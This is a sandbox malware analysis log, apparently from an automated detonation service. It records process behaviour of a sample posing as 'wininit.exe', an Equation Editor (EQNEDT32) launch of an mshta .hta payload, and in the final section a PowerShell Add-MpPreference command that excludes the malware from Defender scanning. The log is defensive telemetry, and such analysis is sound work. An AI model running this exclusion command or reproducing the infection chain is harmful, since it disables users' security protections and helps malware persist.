                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess information set: NOGPFAULTERRORBOX
                Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 2D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 20E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 2D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 59A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 5710000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 69A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: 79A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1259Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3238Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1604Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3968Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1303
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.dllJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3772Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exe TID: 3860Thread sleep time: -180000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2108Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep count: 1604 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4076Thread sleep count: 3968 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2464Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 2180Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep count: 1303 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2692Thread sleep count: 2543 > 30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2216Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wininit.exe TID: 2456Thread sleep time: -780000s >= -30000s
                Source: C:\Windows\System32\verclsid.exe TID: 3188Thread sleep time: -60000s >= -30000s
                Source: C:\Windows\System32\verclsid.exe TID: 3188Thread sleep time: -60000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,18_2_00403D74
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\wininit.exeThread delayed: delay time: 60000
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_8-637
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_8-651
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_8-640
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 8_2_035F05C8 mov edx, dword ptr fs:[00000030h]8_2_035F05C8
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_0040317B mov eax, dword ptr fs:[00000030h]18_2_0040317B
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_00402B7C GetProcessHeap,RtlAllocateHeap,18_2_00402B7C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess token adjusted: Debug
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeMemory written: C:\Users\user\AppData\Roaming\wininit.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" Jump to behavior
